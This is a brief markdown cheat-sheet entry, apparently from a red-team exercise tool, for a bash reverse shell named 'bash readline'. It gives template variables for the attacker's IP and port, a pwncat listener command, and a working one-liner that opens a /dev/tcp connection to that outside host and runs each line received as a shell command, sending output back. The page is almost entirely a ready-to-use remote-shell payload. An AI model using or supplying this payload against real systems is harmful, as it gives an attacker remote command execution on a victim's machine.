# bash readline

[TOC]

## Vars

| Variable | Value     | Description |
| -------- | --------- | ----------- |
| LHOST    | {{LHOST}} | The IP the target will connect to |
| LPORT    | {{LPORT}} | The port the target will connect to |

## Description

`bash readline` uses `/dev/tcp` and a `while` loop to read and execute one line at a time.

## Commands

### Red: Create Listener

```bash
autovnet rtfm pwncat -n {{LHOST}} {{LPORT}}
```

### Blue: Throw Reverse Shell

```bash
exec 5<>/dev/tcp/{{LHOST}}/{{LPORT}};cat <&5 | while read line; do $line 2>&5 >&5; done
```
